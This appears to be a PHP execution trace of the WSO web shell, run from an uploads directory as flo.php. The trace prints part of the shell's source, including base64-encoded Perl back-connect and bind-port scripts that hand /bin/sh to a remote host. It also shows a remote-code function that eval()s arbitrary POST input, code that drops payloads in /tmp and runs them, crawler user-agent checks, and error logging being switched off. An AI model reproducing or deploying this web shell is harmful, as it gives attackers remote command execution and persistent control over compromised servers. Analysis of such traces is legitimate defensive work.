\';\n wsoFooter();\n}\nfunction actionNetwork() {\n wsoHeader();\n $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";\n $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";\n echo "

Network tools

\n
\n Bind port to /bin/sh [perl]
\n Port: >\'>\n
\n
\n Back-connect [perl]
\n Server: Port: >\'>\n

";\n if(isset($_POST[\'p1\'])) {\n function cf($f,$t) {\n $w = @fopen($f,"w") or @function_exists(\'file_put_contents\');\n if($w){\n @fwrite($w,@base64_decode($t));\n @fclose($w);\n }\n }\n if($_POST[\'p1\'] == \'bpp\') {\n cf("/tmp/bp.pl",$bind_port_p);\n $out = wsoEx("perl /tmp/bp.pl ".$_POST[\'p2\']." 1>/dev/null 2>&1 &");\n sleep(1);\n echo "
$out\\n".wsoEx("ps aux | grep bp.pl")."
";\n unlink("/tmp/bp.pl");\n }\n if($_POST[\'p1\'] == \'bcp\') {\n cf("/tmp/bc.pl",$back_connect_p);\n $out = wsoEx("perl /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." 1>/dev/null 2>&1 &");\n sleep(1);\n echo "
$out\\n".wsoEx("ps aux | grep bc.pl")."
";\n unlink("/tmp/bc.pl");\n }\n }\n echo \'
\';\n wsoFooter();\n}\nfunction actionRC() {\n if(!@$_POST[\'p1\']) {\n $a = array(\n "uname" => php_uname(),\n "php_version" => phpversion(),\n "wso_version" => WSO_VERSION,\n "safemode" => @ini_get(\'safe_mode\')\n );\n echo serialize($a);\n } else {\n eval($_POST[\'p1\']);\n }\n}\nif( empty($_POST[\'a\']) )\n if(isset($default_action) && function_exists(\'action\' . $default_action))\n $_POST[\'a\'] = $default_action;\n else\n $_POST[\'a\'] = \'SecInfo\';\nif( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) )\n call_user_func(\'action\' . $_POST[\'a\']);\nexit;\n\n' /var/www/html/uploads/flo.php 12 0 2 A /var/www/html/uploads/flo.php(12) : eval()'d code 1 $auth_pass = '705d77357e3d116ad219ba8e756b47f0' 2 A /var/www/html/uploads/flo.php(12) : eval()'d code 2 $color = '#df5' 2 A /var/www/html/uploads/flo.php(12) : eval()'d code 3 $default_action = 'FilesMan' 2 A /var/www/html/uploads/flo.php(12) : eval()'d code 4 $default_use_ajax = TRUE 2 A /var/www/html/uploads/flo.php(12) : eval()'d code 5 $default_charset = 'Windows-1251' 2 A /var/www/html/uploads/flo.php(12) : eval()'d code 8 $userAgents = [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler'] 3 8 0 0.007149 1257192 implode 0 /var/www/html/uploads/flo.php(12) : eval()'d code 9 2 '|' [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler'] 3 8 1 0.007171 1257336 3 8 R 'Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler' 3 9 0 0.007190 1257272 preg_match 0 /var/www/html/uploads/flo.php(12) : eval()'d code 9 2 '/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i' 'python-requests/2.25.1' 3 9 1 0.007211 1257336 3 9 R 0 3 10 0 0.007225 1257192 ini_set 0 /var/www/html/uploads/flo.php(12) : eval()'d code 15 2 'error_log' NULL 3 10 1 0.007242 1257264 3 10 R '' 3 11 0 0.007255 1257192 ini_set 0 /var/www/html/uploads/flo.php(12) : eval()'d code 16 2 'log_errors' 0 3 11 1 0.007271 1257264 3 11 R '1' 3 12 0 0.007284 1257192 ini_set 0 /var/www/html/uploads/flo.php(12) : eval()'d code 17 2 'max_execution_time' 0 3 12 1 0.007301 1257296 3 12 R '30' 3 13 0 0.007315 1257192 set_time_limit 0 /var/www/html/uploads/flo.php(12) : eval()'d code 18 1 0 3 13 1 0.007330 1257256 3 13 R FALSE 2 7 1 0.007349 1258296 1 3 1 0.007362 1224160 1 14 0 0.007369 1224192 Error->__toString 0 Unknown 0 0 2 15 0 0.007382 1224272 Error->getTraceAsString 0 Unknown 0 0 2 15 1 0.007394 1224528 2 15 R '#0 /var/www/html/uploads/flo.php(12): eval()\n#1 {main}' 1 14 1 0.007414 1224824 1 14 R 'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/flo.php(12) : eval()\'d code:19\nStack trace:\n#0 /var/www/html/uploads/flo.php(12): eval()\n#1 {main}' 0.007466 1145616 TRACE END [2023-02-13 01:50:28.843530]